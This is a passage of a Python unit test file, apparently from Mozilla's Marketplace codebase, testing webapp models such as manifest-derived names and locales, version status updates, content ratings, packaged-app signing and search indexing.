self.webapp = amo.tests.app_factory(is_packaged=True,
default_locale='en-US')
self.webapp.name = {'en-US': 'Packaged App'}
self.webapp.save()
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_default_name_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo'}
self.trans_eq(self.webapp.name, 'en-US', 'Packaged App')
self.webapp.update_name_from_package_manifest()
self.webapp = Webapp.objects.get(pk=self.webapp.pk)
self.trans_eq(self.webapp.name, 'en-US', 'Yo')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_default_locale_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo', 'default_locale': 'fr'}
eq_(self.webapp.default_locale, 'en-US')
self.webapp.update_name_from_package_manifest()
eq_(self.webapp.default_locale, 'fr')
self.trans_eq(self.webapp.name, 'en-US', None)
self.trans_eq(self.webapp.name, 'fr', 'Yo')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_locales_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo',
'locales': {'es': {'name': 'es'},
'de': {'name': 'de'}}}
self.webapp.update_supported_locales()
eq_(self.webapp.current_version.supported_locales, 'de,es')
def test_update_name_from_package_manifest_version(self):
evil_manifest = {
'name': u'Evil App Name'
}
good_manifest = {
'name': u'Good App Name',
}
latest_version = version_factory(addon=self.webapp, version='2.3',
file_kw=dict(status=amo.STATUS_DISABLED))
current_version = self.webapp.current_version
AppManifest.objects.create(version=current_version,
manifest=json.dumps(good_manifest))
AppManifest.objects.create(version=latest_version,
manifest=json.dumps(evil_manifest))
self.webapp.update_name_from_package_manifest()
eq_(self.webapp.name, u'Good App Name')
class TestWebappVersion(amo.tests.TestCase):
fixtures = ['base/platforms']
def test_no_version(self):
eq_(Webapp().get_latest_file(), None)
def test_no_file(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
webapp._current_version = Version.objects.create(addon=webapp)
eq_(webapp.get_latest_file(), None)
def test_right_file(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
version = Version.objects.create(addon=webapp)
old_file = File.objects.create(version=version, platform_id=1)
old_file.update(created=datetime.now() - timedelta(days=1))
new_file = File.objects.create(version=version, platform_id=1)
webapp._current_version = version
eq_(webapp.get_latest_file().pk, new_file.pk)
class TestWebappManager(amo.tests.TestCase):
def setUp(self):
self.reviewed_eq = (lambda f=[]:
eq_(list(Webapp.objects.reviewed()), f))
self.listed_eq = (lambda f=[]: eq_(list(Webapp.objects.visible()), f))
def test_reviewed(self):
for status in amo.REVIEWED_STATUSES:
w = Webapp.objects.create(status=status)
self.reviewed_eq([w])
Webapp.objects.all().delete()
def test_unreviewed(self):
for status in amo.UNREVIEWED_STATUSES:
Webapp.objects.create(status=status)
self.reviewed_eq()
Webapp.objects.all().delete()
def test_listed(self):
# Public status, non-null current version, non-user-disabled.
w = app_factory(status=amo.STATUS_PUBLIC)
self.listed_eq([w])
def test_unlisted(self):
# Public, null current version, non-user-disabled.
w = Webapp.objects.create()
self.listed_eq()
# With current version but unreviewed.
Version.objects.create(addon=w)
self.listed_eq()
# And user-disabled.
w.update(disabled_by_user=True)
self.listed_eq()
def test_by_identifier(self):
w = Webapp.objects.create(app_slug='foo')
eq_(Webapp.objects.by_identifier(w.id), w)
eq_(Webapp.objects.by_identifier(str(w.id)), w)
eq_(Webapp.objects.by_identifier(w.app_slug), w)
with self.assertRaises(Webapp.DoesNotExist):
Webapp.objects.by_identifier('fake')
def test_rated(self):
self.create_switch('iarc')
rated = app_factory(rated=True)
app_factory()
eq_(Webapp.objects.count(), 2)
eq_(list(Webapp.objects.rated()), [rated])
class TestManifest(BaseWebAppTest):
def test_get_manifest_json(self):
webapp = self.post_addon()
assert webapp.current_version
assert webapp.current_version.has_files
with open(self.manifest, 'r') as mf:
manifest_json = json.load(mf)
eq_(webapp.get_manifest_json(), manifest_json)
class PackagedFilesMixin(amo.tests.AMOPaths):
def setUp(self):
self.package = self.packaged_app_path('mozball.zip')
def setup_files(self, filename='mozball.zip'):
# This assumes self.file exists.
if not storage.exists(self.file.file_path):
try:
# We don't care if these dirs exist.
os.makedirs(os.path.dirname(self.file.file_path))
except OSError:
pass
shutil.copyfile(self.packaged_app_path(filename),
self.file.file_path)
class TestPackagedModel(amo.tests.TestCase):
@mock.patch.object(settings, 'SITE_URL', 'http://hy.fr')
@mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
def test_create_blocklisted_version(self):
app = app_factory(name=u'Mozillaball ょ', app_slug='test',
is_packaged=True, version_kw={'version': '1.0',
'created': None})
app.create_blocklisted_version()
app = app.reload()
v = app.versions.latest()
f = v.files.latest()
eq_(app.status, amo.STATUS_BLOCKED)
eq_(app.versions.count(), 2)
eq_(v.version, 'blocklisted')
eq_(app._current_version, v)
assert 'blocklisted' in f.filename
eq_(f.status, amo.STATUS_BLOCKED)
# Check manifest.
url = app.get_manifest_url()
res = self.client.get(url)
eq_(res['Content-type'],
'application/x-web-app-manifest+json; charset=utf-8')
assert 'etag' in res._headers
data = json.loads(res.content)
eq_(data['name'], 'Blocked by Mozilla')
eq_(data['version'], 'blocklisted')
eq_(data['package_path'], 'http://hy.fr/downloads/file/%s/%s' % (
f.id, f.filename))
class TestPackagedManifest(BasePackagedAppTest):
def _get_manifest_json(self):
zf = zipfile.ZipFile(self.package)
data = zf.open('manifest.webapp').read()
zf.close()
return json.loads(data)
def test_get_manifest_json(self):
webapp = self.post_addon()
eq_(webapp.status, amo.STATUS_NULL)
assert webapp.current_version
assert webapp.current_version.has_files
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(), mf)
def test_get_manifest_json_w_file(self):
webapp = self.post_addon()
eq_(webapp.status, amo.STATUS_NULL)
assert webapp.current_version
assert webapp.current_version.has_files
file_ = webapp.current_version.all_files[0]
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(file_), mf)
def test_get_manifest_json_multiple_versions(self):
# Post the real app/version, but backfill an older version.
webapp = self.post_addon()
latest_version = webapp.latest_version
webapp.current_version.files.update(status=amo.STATUS_PUBLIC)
version = version_factory(addon=webapp, version='0.5',
created=self.days_ago(1))
version.files.update(created=self.days_ago(1))
webapp = Webapp.objects.get(pk=webapp.pk)
webapp._current_version = None # update_version() should find the 1.0.
webapp.update_version()
eq_(webapp.current_version, latest_version)
assert webapp.current_version.has_files
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(), mf)
def test_get_manifest_json_multiple_version_disabled(self):
# Post an app, then emulate a reviewer reject and add a new, pending
# version.
webapp = self.post_addon()
webapp.latest_version.files.update(status=amo.STATUS_DISABLED)
webapp.latest_version.update(created=self.days_ago(1))
webapp.update(status=amo.STATUS_REJECTED, _current_version=None)
version = version_factory(addon=webapp, version='2.0',
file_kw=dict(status=amo.STATUS_PENDING))
mf = self._get_manifest_json()
AppManifest.objects.create(version=version,
manifest=json.dumps(mf))
webapp.update_version()
webapp = webapp.reload()
eq_(webapp.latest_version, version)
self.file = version.all_files[0]
self.setup_files()
eq_(webapp.get_manifest_json(), mf)
def test_cached_manifest_is_cached(self):
webapp = self.post_addon()
# First call does queries and caches results.
webapp.get_cached_manifest()
# Subsequent calls are cached.
with self.assertNumQueries(0):
webapp.get_cached_manifest()
@mock.patch('mkt.webapps.models.cache')
def test_cached_manifest_no_version_not_cached(self, cache_mock):
webapp = self.post_addon(
data={'packaged': True, 'free_platforms': 'free-firefoxos'})
webapp._current_version = None
eq_(webapp.get_cached_manifest(force=True), '{}')
assert not cache_mock.called
def test_cached_manifest_contents(self):
webapp = self.post_addon(
data={'packaged': True, 'free_platforms': 'free-firefoxos'})
version = webapp.current_version
self.file = version.all_files[0]
self.setup_files()
manifest = self._get_manifest_json()
data = json.loads(webapp.get_cached_manifest())
eq_(data['name'], webapp.name)
eq_(data['version'], webapp.current_version.version)
eq_(data['size'], self.file.size)
eq_(data['release_notes'], version.releasenotes)
eq_(data['package_path'], absolutify(
os.path.join(reverse('downloads.file', args=[self.file.id]),
self.file.filename)))
eq_(data['developer'], manifest['developer'])
eq_(data['icons'], manifest['icons'])
eq_(data['locales'], manifest['locales'])
@mock.patch.object(packaged, 'sign', mock_sign)
def test_package_path(self):
webapp = self.post_addon(
data={'packaged': True, 'free_platforms': 'free-firefoxos'})
version = webapp.current_version
file = version.all_files[0]
res = self.client.get(file.get_url_path('manifest'))
eq_(res.status_code, 200)
eq_(res['content-type'], 'application/zip')
def test_packaged_with_BOM(self):
# Exercise separate code paths to loading the packaged app manifest.
self.setup_files('mozBOM.zip')
assert WebAppParser().parse(self.file.file_path)
self.assertTrue(self.app.has_icon_in_manifest())
class TestDomainFromURL(unittest.TestCase):
def test_simple(self):
eq_(Webapp.domain_from_url('http://mozilla.com/'),
'http://mozilla.com')
def test_long_path(self):
eq_(Webapp.domain_from_url('http://mozilla.com/super/rad.webapp'),
'http://mozilla.com')
def test_no_normalize_www(self):
eq_(Webapp.domain_from_url('http://www.mozilla.com/super/rad.webapp'),
'http://www.mozilla.com')
def test_with_port(self):
eq_(Webapp.domain_from_url('http://mozilla.com:9000/'),
'http://mozilla.com:9000')
def test_subdomains(self):
eq_(Webapp.domain_from_url('http://apps.mozilla.com/'),
'http://apps.mozilla.com')
def test_https(self):
eq_(Webapp.domain_from_url('https://mozilla.com/'),
'https://mozilla.com')
def test_normalize_case(self):
eq_(Webapp.domain_from_url('httP://mOzIllA.com/'),
'http://mozilla.com')
@raises(ValueError)
def test_none(self):
Webapp.domain_from_url(None)
@raises(ValueError)
def test_empty(self):
Webapp.domain_from_url('')
def test_empty_or_none(self):
eq_(Webapp.domain_from_url(None, allow_none=True), None)
class TestTransformer(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.device = DEVICE_TYPES.keys()[0]
@mock.patch('mkt.webapps.models.Addon.transformer')
def test_addon_transformer_not_called(self, transformer):
transformer.return_value = {}
list(Webapp.objects.all())
assert not transformer.called
def test_versions(self):
webapps = list(Webapp.objects.all())
with self.assertNumQueries(0):
for webapp in webapps:
ok_(isinstance(webapp.latest_version, Version))
ok_(isinstance(webapp.current_version, Version))
def test_previews(self):
p1 = Preview.objects.create(filetype='image/png', addon_id=337141,
position=0)
p2 = Preview.objects.create(filetype='image/png', addon_id=337141,
position=1)
webapps = list(Webapp.objects.all())
with self.assertNumQueries(0):
for webapp in webapps:
eq_(webapp.all_previews, [p1, p2])
def test_prices(self):
self.make_premium(Webapp.objects.get(pk=337141))
webapps = list(Webapp.objects.all())
with self.assertNumQueries(0):
for webapp in webapps:
ok_(unicode(webapp.premium))
eq_(str(webapp.get_tier().price), '1.00')
ok_(webapp.get_tier_name())
def test_prices_free(self):
webapps = list(Webapp.objects.all())
with self.assertNumQueries(0):
for webapp in webapps:
eq_(webapp.premium, None)
eq_(webapp.get_tier(), None)
def test_device_types(self):
AddonDeviceType.objects.create(addon_id=337141,
device_type=self.device)
webapps = list(Webapp.objects.filter(id=337141))
with self.assertNumQueries(0):
for webapp in webapps:
assert webapp._device_types
eq_(webapp.device_types, [DEVICE_TYPES[self.device]])
def test_device_type_cache(self):
webapp = Webapp.objects.get(id=337141)
webapp._device_types = []
with self.assertNumQueries(0):
eq_(webapp.device_types, [])
class TestDetailsComplete(amo.tests.TestCase):
def setUp(self):
self.device = DEVICE_TYPES.keys()[0]
self.cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
self.webapp = Webapp.objects.create(type=amo.ADDON_WEBAPP,
status=amo.STATUS_NULL)
def fail(self, value):
assert not self.webapp.details_complete(), value
reasons = self.webapp.details_errors()
assert value in reasons[0], reasons
def test_fail(self):
self.fail('email')
self.webapp.support_email = '[email protected]'
self.webapp.save()
self.fail('name')
self.webapp.name = 'name'
self.webapp.save()
self.fail('device')
self.webapp.addondevicetype_set.create(device_type=self.device)
self.webapp.save()
self.fail('category')
AddonCategory.objects.create(addon=self.webapp, category=self.cat)
self.fail('screenshot')
self.webapp.previews.create()
eq_(self.webapp.details_complete(), True)
class TestAddonExcludedRegion(amo.tests.WebappTestCase):
def setUp(self):
super(TestAddonExcludedRegion, self).setUp()
self.excluded = self.app.addonexcludedregion
eq_(list(self.excluded.values_list('id', flat=True)), [])
self.er = self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
eq_(list(self.excluded.values_list('id', flat=True)), [self.er.id])
def test_exclude_multiple(self):
other = AddonExcludedRegion.objects.create(addon=self.app,
region=mkt.regions.BR.id)
self.assertSetEqual(self.excluded.values_list('id', flat=True),
[self.er.id, other.id])
def test_remove_excluded(self):
self.er.delete()
eq_(list(self.excluded.values_list('id', flat=True)), [])
def test_get_region(self):
eq_(self.er.get_region(), mkt.regions.UK)
def test_unicode(self):
eq_(unicode(self.er), '%s: %s' % (self.app, mkt.regions.UK.slug))
class TestContentRating(amo.tests.WebappTestCase):
def setUp(self):
self.app = self.get_app()
self.create_switch('iarc')
@mock.patch.object(mkt.regions.BR, 'ratingsbody',
mkt.ratingsbodies.CLASSIND)
@mock.patch.object(mkt.regions.US, 'ratingsbody', mkt.ratingsbodies.ESRB)
@mock.patch.object(mkt.regions.VE, 'ratingsbody',
mkt.ratingsbodies.GENERIC)
def test_get_regions_and_slugs(self):
classind_rating = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
regions = classind_rating.get_regions()
assert mkt.regions.BR in regions
assert mkt.regions.US not in regions
assert mkt.regions.VE not in regions
slugs = classind_rating.get_region_slugs()
assert mkt.regions.BR.slug in slugs
assert mkt.regions.US.slug not in slugs
assert mkt.regions.VE.slug not in slugs
@mock.patch.object(mkt.regions.BR, 'ratingsbody',
mkt.ratingsbodies.CLASSIND)
@mock.patch.object(mkt.regions.DE, 'ratingsbody', mkt.ratingsbodies.ESRB)
@mock.patch.object(mkt.regions.VE, 'ratingsbody',
mkt.ratingsbodies.GENERIC)
def test_get_regions_and_slugs_generic_fallback(self):
gen_rating = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=0)
regions = gen_rating.get_regions()
assert mkt.regions.BR not in regions
assert mkt.regions.DE not in regions
assert mkt.regions.VE in regions
slugs = gen_rating.get_region_slugs()
assert mkt.regions.BR.slug not in slugs
assert mkt.regions.DE.slug not in slugs
assert mkt.regions.VE.slug not in slugs
# We have a catch-all 'generic' region for all regions wo/ r.body.
assert mkt.regions.GENERIC_RATING_REGION_SLUG in slugs
@mock.patch.object(mkt.ratingsbodies.CLASSIND, 'name', 'CLASSIND')
@mock.patch.object(mkt.ratingsbodies.CLASSIND_10, 'name', '10+')
@mock.patch.object(mkt.ratingsbodies.ESRB_E, 'name', 'Everybody 10+')
@mock.patch.object(mkt.ratingsbodies.ESRB_E, 'label', '10')
def test_get_ratings(self):
# Infer the label from the name.
cr = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=mkt.ratingsbodies.CLASSIND_10.id)
eq_(cr.get_rating().label, '10')
eq_(cr.get_body().label, 'classind')
# When already has label set.
eq_(ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.ESRB.id,
rating=mkt.ratingsbodies.ESRB_E.id).get_rating().label,
'10')
class TestContentRatingsIn(amo.tests.WebappTestCase):
def test_not_in_region(self):
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region), [])
for region in mkt.regions.ALL_REGIONS:
AddonExcludedRegion.objects.create(addon=self.app,
region=region.id)
eq_(self.get_app().content_ratings_in(region=region), [])
def test_in_for_region_and_category(self):
cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region, category='games'),
[])
eq_(self.app.content_ratings_in(region=region, category=cat), [])
def test_in_region_and_category(self):
self.make_game()
cat = Category.objects.get(slug='games')
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.listed_in(region=region, category='games'), True)
eq_(self.app.listed_in(region=region, category=cat),
True)
def test_in_region_and_not_in_category(self):
cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region, category='games'),
[])
eq_(self.app.content_ratings_in(region=region, category=cat), [])
@mock.patch.object(mkt.regions.CO, 'ratingsbody', None)
@mock.patch.object(mkt.regions.BR, 'ratingsbody',
mkt.ratingsbodies.CLASSIND)
def test_generic_fallback(self):
# Test region with no rating body returns generic content rating.
crs = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=mkt.ratingsbodies.GENERIC_3.id)
eq_(self.app.content_ratings_in(region=mkt.regions.CO), [crs])
# Test region with rating body does not include generic content rating.
assert crs not in self.app.content_ratings_in(region=mkt.regions.BR)
class TestIARCInfo(amo.tests.WebappTestCase):
def test_no_info(self):
with self.assertRaises(IARCInfo.DoesNotExist):
self.app.iarc_info
def test_info(self):
IARCInfo.objects.create(addon=self.app, submission_id=1,
security_code='s3kr3t')
eq_(self.app.iarc_info.submission_id, 1)
eq_(self.app.iarc_info.security_code, 's3kr3t')
class TestQueue(amo.tests.WebappTestCase):
def test_in_queue(self):
assert not self.app.in_rereview_queue()
RereviewQueue.objects.create(addon=self.app)
assert self.app.in_rereview_queue()
class TestPackagedSigning(amo.tests.WebappTestCase):
@mock.patch('lib.crypto.packaged.sign')
def test_not_packaged(self, sign):
self.app.update(is_packaged=False)
assert not self.app.sign_if_packaged(self.app.current_version.pk)
assert not sign.called
@mock.patch('lib.crypto.packaged.sign')
def test_packaged(self, sign):
self.app.update(is_packaged=True)
assert self.app.sign_if_packaged(self.app.current_version.pk)
eq_(sign.call_args[0][0], self.app.current_version.pk)
@mock.patch('lib.crypto.packaged.sign')
def test_packaged_reviewer(self, sign):
self.app.update(is_packaged=True)
assert self.app.sign_if_packaged(self.app.current_version.pk,
reviewer=True)
eq_(sign.call_args[0][0], self.app.current_version.pk)
eq_(sign.call_args[1]['reviewer'], True)
class TestUpdateStatus(amo.tests.TestCase):
def setUp(self):
# Disabling signals to simplify these tests. We call update_status()
# manually in them.
version_changed_signal.disconnect(version_changed,
dispatch_uid='version_changed')
post_save.disconnect(update_status, sender=Version,
dispatch_uid='version_update_status')
post_delete.disconnect(update_status, sender=Version,
dispatch_uid='version_update_status')
def tearDown(self):
version_changed_signal.connect(version_changed,
dispatch_uid='version_changed')
post_save.connect(update_status, sender=Version,
dispatch_uid='version_update_status')
post_delete.connect(update_status, sender=Version,
dispatch_uid='version_update_status')
def test_no_versions(self):
app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_version_no_files(self):
app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
Version(addon=app).save()
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_only_version_deleted(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_other_version_deleted(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
amo.tests.version_factory(addon=app)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_REJECTED)
def test_one_version_pending(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED,
file_kw=dict(status=amo.STATUS_DISABLED))
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_PENDING))
with mock.patch('mkt.webapps.models.Webapp.is_fully_complete') as comp:
comp.return_value = True
app.update_status()
eq_(app.status, amo.STATUS_PENDING)
def test_one_version_pending_not_fully_complete(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED,
file_kw=dict(status=amo.STATUS_DISABLED))
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_PENDING))
with mock.patch('mkt.webapps.models.Webapp.is_fully_complete') as comp:
comp.return_value = False
app.update_status()
eq_(app.status, amo.STATUS_REJECTED) # Didn't change.
def test_one_version_public(self):
app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_DISABLED))
app.update_status()
eq_(app.status, amo.STATUS_PUBLIC)
def test_was_public_waiting_then_new_version(self):
app = amo.tests.app_factory(status=amo.STATUS_PUBLIC_WAITING)
File.objects.filter(version__addon=app).update(status=app.status)
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_PENDING))
app.update_status()
eq_(app.status, amo.STATUS_PUBLIC_WAITING)
def test_blocklisted(self):
app = amo.tests.app_factory(status=amo.STATUS_BLOCKED)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_BLOCKED)
class TestInstalled(amo.tests.TestCase):
def setUp(self):
user = UserProfile.objects.create(email='[email protected]')
app = Addon.objects.create(type=amo.ADDON_WEBAPP)
self.m = functools.partial(Installed.objects.safer_get_or_create,
user=user, addon=app)
def test_install_type(self):
assert self.m(install_type=apps.INSTALL_TYPE_USER)[1]
assert not self.m(install_type=apps.INSTALL_TYPE_USER)[1]
assert self.m(install_type=apps.INSTALL_TYPE_REVIEWER)[1]
class TestAppFeatures(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestAppFeatures, self).setUp()
self.model = AppFeatures
self.related_name = 'features'
self.BOOL_DICT = mkt.constants.features.APP_FEATURES
self.flags = ('APPS', 'GEOLOCATION', 'PAY', 'SMS')
self.expected = [u'App Management API', u'Geolocation', u'Web Payment',
u'WebSMS']
self.af = AppFeatures.objects.get()
def _get_related_bool_obj(self):
return getattr(self.app.current_version, self.related_name)
def test_signature_parity(self):
# Test flags -> signature -> flags works as expected.
self._flag()
signature = self.app.current_version.features.to_signature()
eq_(signature.count('.'), 2, 'Unexpected signature format')
self.af.set_flags(signature)
self._check(self.af)
def test_bad_data(self):
self.af.set_flags('foo')
self.af.set_flags('<script>')
def test_default_false(self):
obj = self.model(version=self.app.current_version)
eq_(getattr(obj, 'has_%s' % self.flags[0].lower()), False)
class TestWebappIndexer(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
def test_mapping_type_name(self):
eq_(WebappIndexer.get_mapping_type_name(), 'webapp')
def test_index(self):
with self.settings(ES_INDEXES={'webapp': 'apps'}):
eq_(WebappIndexer.get_index(), 'apps')
def test_model(self):
eq_(WebappIndexer.get_model(), Webapp)
def test_mapping(self):
mapping = WebappIndexer.get_mapping()
eq_(mapping.keys(), ['webapp'])
eq_(mapping['webapp']['_all'], {'enabled': False})
eq_(mapping['webapp']['_boost'], {'name': '_boost', 'null_value': 1.0})
def test_mapping_properties(self):
# Spot check a few of the key properties.
mapping = WebappIndexer.get_mapping()
keys = mapping['webapp']['properties'].keys()
for k in ('id', 'app_slug', 'category', 'default_locale',
'description', 'device', 'features', 'name', 'status'):
ok_(k in keys, 'Key %s not found in mapping properties' % k)
def _get_doc(self):
qs = Webapp.indexing_transformer(
Webapp.objects.no_cache().filter(id__in=[self.app.pk]))
obj = qs[0]
return obj, WebappIndexer.extract_document(obj.pk, obj)
def test_extract(self):
obj, doc = self._get_doc()
eq_(doc['id'], obj.id)
eq_(doc['app_slug'], obj.app_slug)
eq_(doc['category'], [])
eq_(doc['default_locale'], obj.default_locale)
eq_(doc['description'], list(
set(s for _, s in obj.translations[obj.description_id])))
eq_(doc['description_translations'],
[{'lang': to_language(l), 'string': s}
for l, s in obj.translations[obj.description_id]])
eq_(doc['device'], [])
eq_(doc['name'], list(
set(s for _, s in obj.translations[obj.name_id])))
eq_(doc['name_translations'],
[{'lang': to_language(l), 'string': s}
for l, s in obj.translations[obj.name_id]])
eq_(doc['status'], obj.status)
eq_(doc['is_escalated'], False)
eq_(doc['latest_version']['status'], amo.STATUS_PUBLIC)
eq_(doc['latest_version']['has_editor_comment'], False)
eq_(doc['latest_version']['has_info_request'], False)
def test_extract_category(self):
cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
AddonCategory.objects.create(addon=self.app, category=cat)
obj, doc = self._get_doc()
eq_(doc['category'], [cat.slug])
def test_extract_device(self):
device = DEVICE_TYPES.keys()[0]
AddonDeviceType.objects.create(addon=self.app, device_type=device)
obj, doc = self._get_doc()
eq_(doc['device'], [device])
def test_extract_features(self):
enabled = ('has_apps', 'has_sms', 'has_geolocation')
self.app.current_version.features.update(
**dict((k, True) for k in enabled))
obj, doc = self._get_doc()
for k, v in doc['features'].iteritems():
eq_(v, k in enabled)
def test_extract_regions(self):
self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
obj, doc = self._get_doc()
self.assertSetEqual(doc['region_exclusions'],
set([mkt.regions.BR.id, mkt.regions.UK.id]))
def test_extract_supported_locales(self):
locales = 'en-US,es,pt-BR'
self.app.current_version.update(supported_locales=locales)
obj, doc = self._get_doc()
self.assertSetEqual(doc['supported_locales'], set(locales.split(',')))
def test_extract_latest_version(self):
amo.tests.version_factory(addon=self.app, version='43.0',
has_editor_comment=True,
has_info_request=True,
file_kw=dict(status=amo.STATUS_REJECTED))
obj, doc = self._get_doc()
eq_(doc['latest_version']['status'], amo.STATUS_REJECTED)
eq_(doc['latest_version']['has_editor_comment'], True)
eq_(doc['latest_version']['has_info_request'], True)
def test_extract_is_escalated(self):
EscalationQueue.objects.create(addon=self.app)
obj, doc = self._get_doc()
eq_(doc['is_escalated'], True)
def test_extract_content_ratings(self):
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=0)
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.PEGI.id,
rating=mkt.ratingsbodies.PEGI_12.id)
obj, doc = self._get_doc()
content_ratings = doc['content_ratings']
eq_(len(content_ratings), 3)
eq_(doc['content_ratings']['classind'],
{'body': mkt.ratingsbodies.CLASSIND.id,
'rating': mkt.ratingsbodies.CLASSIND_L.id})
eq_(doc['content_ratings']['generic'],
{'body': mkt.ratingsbodies.GENERIC.id,
'rating': mkt.ratingsbodies.GENERIC_3.id})
eq_(doc['content_ratings']['pegi'],
{'body': mkt.ratingsbodies.PEGI.id,
'rating': mkt.ratingsbodies.PEGI_12.id})
def test_extract_release_notes(self):
release_notes = {
'fr': u'Dès notes de version.',
'en-US': u'Some release nötes.'
}
version = self.app.current_version
version.releasenotes = release_notes
version.save()
obj, doc = self._get_doc()
eq_(doc['release_notes_translations'][0],
{'lang': 'en-US', 'string': release_notes['en-US']})
eq_(doc['release_notes_translations'][1],
{'lang': 'fr', 'string': release_notes['fr']})
class TestRatingDescriptors(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestRatingDescriptors, self).setUp()
self.model = RatingDescriptors
self.related_name = 'rating_descriptors'
self.BOOL_DICT = mkt.ratingdescriptors.RATING_DESCS
self.flags = ('ESRB_VIOLENCE', 'PEGI_LANG', 'CLASSIND_DRUGS')
self.expected = [u'Violence', u'Language', u'Drugs']
RatingDescriptors.objects.create(addon=self.app)
@mock.patch.dict('mkt.ratingdescriptors.RATING_DESCS',
PEGI_LANG={'name': _(u'H\xe9llo')})
def test_to_list_nonascii(self):
self.expected[1] = u'H\xe9llo'
self._flag()
to_list = self.app.rating_descriptors.to_list()
self.assertSetEqual(self.to_unicode(to_list), self.expected)
def test_desc_mapping(self):
descs = RatingDescriptors.objects.create(addon=app_factory())
for body, mapping in DESC_MAPPING.items():
for native, rating_desc_field in mapping.items():
assert hasattr(descs, rating_desc_field), rating_desc_field
def test_reverse_desc_mapping(self):
descs = RatingDescriptors.objects.create(addon=app_factory())
for desc in descs._fields():
eq_(type(REVERSE_DESC_MAPPING.get(desc)), unicode, desc)
def test_iarc_deserialize(self):
descs = RatingDescriptors.objects.create(
addon=app_factory(), has_esrb_blood=True, has_pegi_scary=True)
self.assertSetEqual(descs.iarc_deserialize().split(', '),
['Blood', 'Fear'])
eq_(descs.iarc_deserialize(body=mkt.ratingsbodies.ESRB), 'Blood')
class TestRatingInteractives(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestRatingInteractives, self).setUp()
self.model = RatingInteractives
self.related_name = 'rating_interactives'
self.BOOL_DICT = mkt.ratinginteractives.RATING_INTERACTIVES
self.flags = ('SHARES_INFO', 'DIGITAL_PURCHASES', 'USERS_INTERACT')
self.expected = [u'Shares Info', u'Digital Purchases',
u'Users Interact']
RatingInteractives.objects.create(addon=self.app)
def test_interactives_mapping(self):
interactives = RatingInteractives.objects.create(addon=app_factory())
for native, field in INTERACTIVES_MAPPING.items():
assert hasattr(interactives, field)
def test_reverse_interactives_mapping(self):
interactives = RatingInteractives.objects.create(addon=app_factory())
for interactive_field in interactives._fields():
assert REVERSE_INTERACTIVES_MAPPING.get(interactive_field)
def test_iarc_deserialize(self):
interactives = RatingInteractives.objects.create(
addon=app_factory(), has_users_interact=True, has_shares_info=True)
self.assertSetEqual(
interactives.iarc_deserialize().split(', '),
['Shares Info', 'Users Interact'])
class TestManifestUpload(BaseUploadTest, amo.tests.TestCase):
fixtures = fixture('webapp_337141')
@mock.patch('mkt.webapps.models.parse_addon')
def test_manifest_updated_developer_name(self, parse_addon):
parse_addon.return_value = {
'version': '4.0',
'developer_name': u'Méâ'
}
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
app = Addon.objects.get(pk=337141)
app.manifest_updated('', upload)
version = app.current_version.reload()
eq_(version.version, '4.0')
